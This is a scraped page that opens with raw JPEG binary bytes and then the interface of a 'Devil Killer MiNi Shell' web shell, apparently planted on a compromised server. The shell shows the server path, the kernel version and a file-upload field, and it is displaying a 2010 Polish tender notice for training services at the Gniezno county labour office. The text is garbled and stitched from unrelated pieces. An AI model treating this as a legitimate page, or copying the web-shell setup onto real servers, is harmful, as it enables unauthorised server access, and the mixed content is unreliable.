JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100819/257492-N-2010.html

<p class="kh_header"><b>Gniezno: Usługi szkoleniowe dla Pracowników Powiatowego Urzędu Pracy w Gnieźnie</b><br>
<b>Numer ogłoszenia: 257492 - 2010; data zamieszczenia: 19.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sobieskiego 20, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4261649, faks 061 4261162.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi szkoleniowe dla Pracowników Powiatowego Urzędu Pracy w Gnieźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie usług szkoleniowych dla pracowników Powiatowego Urzędu Pracy w Gnieźnie o następujących tematach:
Część I Skuteczność usług i instrumentów rynku pracy w procesie zmian zachodzących na rynku pracy.
Część II Monitorowanie rynku pracy oraz wykorzystywanie badań rynku pracy w celu zwiększenia efektywności aktywizacji bezrobotnych przez kluczowych pracowników Urzędu Pracy.
Na szkolenia skierowani zostaną kluczowi pracownicy zatrudnieni 
w Powiatowym Urzędzie Pracy w Gnieźnie zgodnie z art. 91 ustawy o promocji zatrudnienia i instytucjach rynku pracy.
Ponadto program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych
i modułowy program szkolenia dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl w zawodzie pośrednik pracy, doradca zawodowy, specjalista ds. rozwoju zawodowego w zakresie promocji usług oraz efektywnej współpracy z klientem.
Wykonawca zobowiązany będzie do określenia godzin z poszczególnych tematów dotyczących szkoleń  oraz treści zajęć, na podstawie opisu przedmiotu zamówienia 
i dodatkowo rozwinąć zakres programowy szkolenia o minimum pięć dodatkowych tematów z danego szkolenia, natomiast harmonogram szkolenia zobowiązany będzie dostarczyć w ciągu pięciu dni przed podpisaniem umowy w celu akceptacji przez Zamawiającego.

Szkolenia powinny być prowadzone w formie wykładów i warsztatów. Warsztaty powinny być prowadzone z wykorzystaniem, co najmniej następujących technik: studia przypadku, ćwiczenia, dyskusje oraz ewentualnie innych technik zaproponowanych przez Wykonawcę 
w szczegółowym programie szkoleń mających na celu lepsze zrozumienie przez uczestników poruszanych zagadnień, w wymiarze 18 godzin zegarowych przypadających na jednego uczestnika. Sposób prowadzenia zajęć powinien być zróżnicowany.
2. Warunki organizacyjne i miejsce szkolenia 
Zamawiający wymaga, aby szkolenia miały charakter wyjazdowy. Wykonawca musi zapewnić transport (niepublicznym środkiem transportu) wszystkim uczestnikom szkolenia pierwszego dnia każdego szkolenia z Gniezna (z Powiatowego Urzędu Pracy w Gnieźnie) do miejsca szkolenia oraz ostatniego dnia każdego szkolenia z miejsca szkolenia do Gniezna (do Powiatowego Urzędu Pracy w Gnieźnie). Środek transportu musi spełniać wszelkie warunki bezpieczeństwa, stan techniczny pojazdu musi być zgodny z przepisami o ruchu drogowym, 

posiadać ogrzewanie, z miejscami siedzącymi na minimum 10 osób + oddzielne miejsce na ulokowanie bagaży uczestników szkolenia. Przewoźnik musi posiadać odpowiednie licencje na przewóz osób.

Wykonawca musi dla każdej z grup zapewnić zakwaterowanie i organizację szkolenia 
w hotelu minimum trzy gwiazdkowym lub pensjonacie o standardzie hotelu minimum trzy gwiazdkowego, w pokojach dwuosobowych, miejsce zakwaterowania musi spełniać warunki wymagane w przepisach bezpieczeństwa i higieny pracy oraz ppoż.

Pokoje w których będą zakwaterowani uczestnicy szkolenia muszą być zadbane, standardem odpowiadające hotelowi/pensjonatowi  z oknem z możliwością jego otwarcia, wyposażone  
w węzeł sanitarny (toaleta, umywalka, prysznic), ogrzewanie. 
Wykonawca musi zagwarantować pełne wyżywienie dla uczestników szkolenia 
tj. śniadania, obiad, kolację, przerwy kawowe. 
 Wykonawca zapewni usługi gastronomiczne rozumiane jako:
- 2 śniadania w formie bufetu (bufet na zimno oraz dania na ciepło) wraz z napojami (kawa, herbata, soki, woda mineralna gazowana oraz niegazowana), dodatki (pieczywo, masło);
- 3 obiady - zawierające: zupę, ciepłe danie główne, surówka, napoje: kawa, herbata, soki, woda mineralna gazowana i niegazowana;
- 2 kolacje (na zimno oraz dania na ciepło) - w formie bufetu, zawierającego przystawki, patery wędlin, deski serów, sałatki, itp. oraz dodatki (pieczywo, masło, sosy), ciepłe danie główne, deser, napoje: kawa, herbata, soki, woda mineralna gazowana oraz niegazowana, 
- 6 przerw kawowych podczas merytorycznej części szkolenia z poczęstunkiem, składających się z kawy, herbaty, wody mineralnej (gazowanej i niegazowanej), soków, ciastek.
Zamawiający wymaga, aby miejsce wydawania i spożywania posiłków znajdowało się w tym samym obiekcie, w którym będzie odbywało się szkolenie oraz  w którym będzie zakwaterowanie, jednak w oddzielnym pomieszczeniu, niż sala wykładowa. 

Ponadto Wykonawca zapewni salę wykładową  do przeprowadzenia szkolenia w miejscu zakwaterowania, która musi spełniać następujące warunki :
- być przestronna i klimatyzowana, przystosowana do liczby osób przewidzianych do przeszkolenia;
- posiadać oświetlenie naturalne i sztuczne; 

 - posiadać miejsca siedzące dla każdego uczestnika szkolenia w układzie kinowym lub szkolnym, z miejscem umożliwiającym wykonywanie notatek przez uczestnika szkolenia;
- gwarantować naukę w warunkach wymaganych w przepisach bezpieczeństwa i higieny pracy;
- być wyposażona w pomoce dydaktyczne dostosowane do prowadzenia szkolenia będącego przedmiotem zamówienia (m.in. urządzenia audiowizualne, nagłośnienie, rzutnik multimedialny, ekran do wyświetlania prezentacji; itd.);
- posiadać zaplecze socjalne i sanitarne;
- być oznaczone informacją o realizacji projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
3. Materiały szkoleniowe 
Do realizacji szkolenia Wykonawca zapewni uczestnikom wszelkie niezbędne  i odpowiednie materiały biurowe i dydaktyczne tzn.: 
- materiały biurowe np.: teczkę na materiały dydaktyczne, długopis, notatnik itp.;  
- materiały dydaktyczne niezbędne do utrwalenia wiadomości np.: podręczniki, skrypty 
z treści przekazywanych w trakcie zajęć szkoleniowych.  
Materiały szkoleniowe przekazywane nieodpłatnie każdemu uczestnikowi muszą być adekwatne do treści szkolenia, dobre jakościowo oraz opatrzone informacją 
o współfinansowaniu z EFS w ramach POKL Dz. 6.1.2 Kwalifikacje drogą do sukcesu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji Programu Operacyjnego Kapitał Ludzki 2007 - 2013 oraz Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki). Materiały wykorzystywane podczas realizacji szkolenia powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie 
z realizowanym tematem zajęć. Wykonawca zobowiązuje się także do przedłożenia Zamawiającemu potwierdzenia przekazania uczestnikom materiałów szkoleniowych. Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność każdego uczestnika.  
Ponadto oryginał lub jego kserokopię potwierdzoną za zgodność z oryginałem oraz komplet materiałów szkoleniowych Wykonawca jest zobowiązany do przekazania Zamawiającemu.

4. Liczba uczestników szkolenia
Kandydaci na szkolenie zostaną wybrani przez Zamawiającego. Wykonawca wyłoniony
w trakcie przetargu po podpisaniu umowy, a najpóźniej dzień przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych przez Powiatowy Urząd Pracy w Gnieźnie zakwalifikowanych do szkolenia.
 Część I Skuteczność usług i instrumentów rynku pracy w procesie zmian zachodzących na rynku pracy
- max 20 pracowników Powiatowego Urzędu Pracy w Gnieźnie.
Szkolenie musi zostać przeprowadzone w dwóch grupach
	I grupa: min. 8 max 10 osób
	II grupa: min. 8 max 10 osób
Część II Monitorowanie rynku pracy oraz wykorzystywanie badań rynku pracy w celu zwiększenia efektywności aktywizacji bezrobotnych przez kluczowych pracowników Urzędu Pracy
- max 20 pracowników Powiatowego Urzędu Pracy w Gnieźnie.
Szkolenie musi zostać przeprowadzone w dwóch grupach
	I grupa: min. 8 max 10 osób
	II grupa: min. 8 max 10 osób
W przypadku nie podjęcia przez wskazaną osobę szkolenia Zamawiający może skierować na zwolnione miejsce inną osobę, która zobowiązana jest realizować obowiązki uczestnika szkolenia. Zamawiający jednak zastrzega sobie prawo do nie skierowania na zwolnione miejsce nowego uczestnika szkolenia wówczas Wykonawca zobowiązany będzie do wystawienia faktury na kwotę, która obejmować będzie  koszt szkolenia tylko za faktycznie przebywających uczestników szkolenia. Zamawiający określił minimalną i maksymalną liczbę uczestników szkolenia na podstawie której Wykonawca może określić wartość zamówienia.  

5. Czas trwania szkoleń (bloków wykładowych)
Wymagana ilość godzin przypadających na jednego uczestnika szkolenia to 18 godzin zegarowych.
Zamawiający wymaga, aby zajęcia prowadzone były w wymiarze 6 godzin zegarowych dziennie, w godzinach między 08:00 a 17:00.
Czas uczestnictwa w szkoleniu należy ustalić na podstawie rozkładu zajęć, a więc ustalić faktyczny czas przebywania uczestnika na zajęciach w godzinach zegarowych (od godziny rozpoczęcia zajęć do godziny ich zakończenia z uwzględnieniem przerw).
Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min oraz przerwę, liczącą średnio 15 min, gdyż długość przerw może być ustalana w sposób elastyczny.
6. Wymagania dotyczące zaświadczeń 
Wymaga się od Wykonawcy, aby każde szkolenie zakończyło się wydaniem zaświadczeń o jego ukończeniu opatrzone informacją o współfinansowaniu z EFS w ramach POKL Dz. 6.1.2 Kwalifikacje drogą do sukcesu. Ponadto na zaświadczeniach muszą zostać umieszczone obowiązujące loga Programu Operacyjnego Kapitał Ludzki oraz Europejskiego Funduszu Społecznego. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem.
7. Nadzór wewnętrzny szkolenia
Szkolenie musi mieć opiekuna wskazanego przez Wykonawcę tj. osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
8. Ubezpieczenie
Wykonawca zobowiązany jest do ubezpieczenia NW uczestnika kursu na czas trwania szkolenia.
9. Wymagania dotyczące ankiet
Wykonawca zobowiązany jest do minimum dwukrotnego ankietowania uczestników szkolenia (na początku i końcu) w celu zbadania poziomu nabytych umiejętności. Ankieta powinna zawierać minimum następujące elementy: ocena swoich kompetencji, program
i metody szkoleniowe, zdobycie nowej wiedzy przez uczestnika, przydatność szkolenia, zgodność materiałów szkoleniowych z programem, kompetencje trenerów, stopień realizacji programu, organizację szkolenia, słabe i mocne strony szkolenia. Wzory ankiet zostaną opracowane przez Wykonawcę i przekazane do zatwierdzenia przez Zamawiającego przed rozpoczęciem szkoleń. Ponadto wypełnione ankiety (oryginały lub ich kserokopie potwierdzone za zgodność z oryginałem) Wykonawca jest zobowiązany do przekazania Zamawiającemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w przypadku posiadania wiedzy i doświadczenia Wykonawca musi wykazać, że organizował co najmniej jedno szkolenie, które zawierało zagadnienia odpowiadające szkoleniu o które będzie się ubiegał, dla grupy osób nie mniejszej niż 10 osób.

Ocena dokonywana będzie na podstawie wykazu szkoleń oraz dołączonych do wykazu listów referencyjnych lub innych dokumentów potwierdzających należytą realizację szkolenia  wg skali ocen: 
1 - 3 szkoleń - 25 punktów, 
4 - 6 szkoleń - 50 punktów, 
7 - 9 szkoleń - 75 punktów, 
10 i więcej szkoleń - 100 punktów;
uzyskane punkty zostaną pomnożone przez wagę kryterium, tj. 20%.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby wskazane do przeprowadzenia szkolenia - wykładowcy muszą posiadać doświadczenie  w przeprowadzonych min. 2 szkoleniach w okresie ostatnich 3 lat przed upływem terminu składania ofert z zakresu tematycznego z którego wykładowca przeprowadzać będzie zajęcia
Ocena spełnienia warunków posiadania osób zdolnych do wykonania zamówienia oceniana będzie w oparciu 
o wykaz osób zdolnych do wykonania zamówienia złożony przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wzór zaświadczenia zgodnie z opisem w pkt. IV ppkt 6 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza  możliwość zmiany miejsca szkolenia tylko w przypadkach wynikających ze zdarzeń losowych , których na dzień składania ofert nie można było przewidzieć. Zmiana wymaga powiadomienia i akceptacji Zamawiającego, nowe miejsce szkolenia musi być zgodne z wymaganiami SIWZ oraz standardowo nie gorsze od miejsca szkolenia zaproponowanego w ofercie.
Zamawiający dopuszcza możliwość zmiany kadry dydaktycznej tylko w przypadkach wynikających ze zdarzeń losowych, dokonana zmiana wymaga powiadomienia i akceptacji Zamawiającego, a zgłoszony wykładowca powinien legitymować się nie niższymi kwalifikacjami, doświadczeniem, wykształceniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno
Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia współfinansowane są ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wspieranie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie - projekt Kwalifikacje drogą do sukcesu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Skuteczność usług i instrumentów rynku pracy w procesie zmian zachodzących na rynku pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie trzydniowego szkolenia Skuteczność usług i instrumentów rynku pracy w procesie zmian zachodzących na rynku pracy dla dwóch grup (o tej samej tematyce) po max 10 osób, poza miastem Gniezno.
Celem szkolenia jest przede wszystkim przekazanie praktycznej wiedzy i umiejętności
w zakresie nawiązania i utrzymania współpracy z pracodawcami i lokalnymi instytucjami oraz pozyskiwania ofert.
Zakres programowy szkolenia
- budowa i realizacja strategii promocyjnej; 
-  techniki promocji i kanałów dystrybucji działań promocyjnych;
- wykorzystywanie socjotechniki w promocji;
- nawiązania i utrzymania współpracy z pracodawcami i lokalnymi instytucjami;
-  opracowanie konspektu sprzedaży usług pośrednictwa pracy;	
- analiza i identyfikacja potrzeb promocyjnych w warunkach lokalnych;
- wykorzystywanie technik interpersonalnych w promocji usług pośrednictwa pracy;
- realizacja ofert z wypracowaniem efektywnego rezultatu.	
Ponadto program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych
i modułowy program szkolenia dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl w zawodzie pośrednik pracy, doradca zawodowy, specjalista ds. rozwoju zawodowego w zakresie promocji usług oraz efektywnej współpracy z klientem.

Termin wykonania zamówienia: Zamawiający wymaga, aby szkolenie zostało przeprowadzone w dwóch grupach:
